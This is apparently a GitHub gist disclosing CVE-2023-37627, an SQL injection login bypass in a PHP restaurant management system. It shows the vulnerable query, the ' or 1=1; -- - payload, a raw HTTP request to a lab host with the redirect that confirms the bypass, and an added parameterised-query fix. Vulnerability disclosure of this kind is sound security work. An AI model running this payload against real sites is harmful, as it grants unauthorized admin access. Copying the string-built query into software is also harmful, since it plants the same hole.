@1337kid
Created July 12, 2023 01:30
PoC for CVE-2023-37627

CVE-2023-37627

Product : Online Restaurant Management System - 1.0
Vulnerability Type : SQL Injection
Vendor of Product : code-projects

Desc : An attacker can bypass the admin panel login and then view order records, add items, delete items, etc.

Vulnerable Code

// file : index.php
...
// User-controlled input taken straight from the POST body, with no escaping or validation.
$email=$_POST['email'];
$password=$_POST['password'];


// The input is concatenated into the SQL text here, so a quote and comment sequence
// in either field becomes part of the query itself.
$sql = "SELECT * FROM admin WHERE email='$email' AND password='$password'";

// prepare() receives the already-built string: no placeholders are bound, so the
// prepared statement gives no protection against the injected SQL.
$query  = $pdoconn->prepare($sql);
$query->execute();
$arr_login=$query->fetchAll(PDO::FETCH_ASSOC);
...

POC

Admin login panel can be bypassed by submitting ' OR 1=1; -- - as the value of either the "password" or the "email" field.

SELECT * FROM admin WHERE email='vulnweb@pwned.tld' AND password='' or 1=1; -- - '

Email validation is present only in the frontend. It can be bypassed either by disabling JavaScript or by sending a POST request directly to admin/login-admin.php.

SELECT * FROM admin WHERE email='' or 1=1; -- -' AND password='vulnweb'
-- Injecting email field

When logging in with the password ' OR 1=1; -- -, we get a 302 redirect to "dashboard.php", indicating that the admin login has been bypassed.
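The following is an added example, not code from the gist or from the affected product: it places a Python stand-in for the vulnerable query from index.php beside the parameterised version that fixes it, and runs both against a constructed in-memory SQLite table (the admin table name, the sample row and the function names are assumptions) with the exact payload quoted above.

```python
"""Vulnerable string-built query vs. a parameterised query, driven by the gist's payload."""
import sqlite3

# The bypass string quoted in the gist, submitted as the password value.
PAYLOAD = "' or 1=1; -- -"


def make_db():
    # Constructed stand-in for the application's admin table (sample data, not real credentials).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
    conn.execute("INSERT INTO admin (email, password) VALUES ('admin@example.test', 'correct horse')")
    return conn


def login_vulnerable(conn, email, password):
    """Mirrors index.php: input is interpolated into the SQL text before it reaches the
    database, so the quote and '-- -' comment in the payload are parsed as SQL. Calling
    prepare() on the finished string, as the PHP does, changes nothing."""
    sql = f"SELECT * FROM admin WHERE email='{email}' AND password='{password}'"
    rows = conn.execute(sql).fetchall()
    return len(rows) > 0


def login_fixed(conn, email, password):
    """Bound parameters: the database receives the SQL and the values separately, so
    the payload is compared as a literal string and matches no row."""
    sql = "SELECT * FROM admin WHERE email=? AND password=?"
    rows = conn.execute(sql, (email, password)).fetchall()
    return len(rows) > 0


def demo():
    conn = make_db()
    return {
        "vulnerable_bypassed": login_vulnerable(conn, "vulnweb@pwned.tld", PAYLOAD),
        "fixed_bypassed": login_fixed(conn, "vulnweb@pwned.tld", PAYLOAD),
        "fixed_valid_login": login_fixed(conn, "admin@example.test", "correct horse"),
    }


if __name__ == "__main__":
    print(demo())
```

The equivalent PDO fix in the PHP above is to pass placeholders to prepare() and the values to execute(), e.g. $pdoconn->prepare("SELECT * FROM admin WHERE email=? AND password=?") followed by $query->execute([$email, $password]); storing passwords with password_hash() and checking them with password_verify() instead of comparing plaintext in SQL is the second fix this code needs.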

Request

POST /RestroGirls/admin/login-admin.php HTTP/1.1
Host: 192.168.56.101
Content-Length: 45
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.56.101
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.56.101/RestroGirls/admin/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=fngds5pmj5jnvtbref6qqoskuk
Connection: close

email=vulnweb%40pwned.tld&password=%27+or+1%3D1%3B+--+-

Response

HTTP/1.1 302 Found
Date: Wed, 12 Jul 2023 01:04:04 GMT
Server: Apache/2.4.55 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
location: dashboard.php
Content-Length: 4
Connection: close
Content-Type: text/html; charset=UTF-8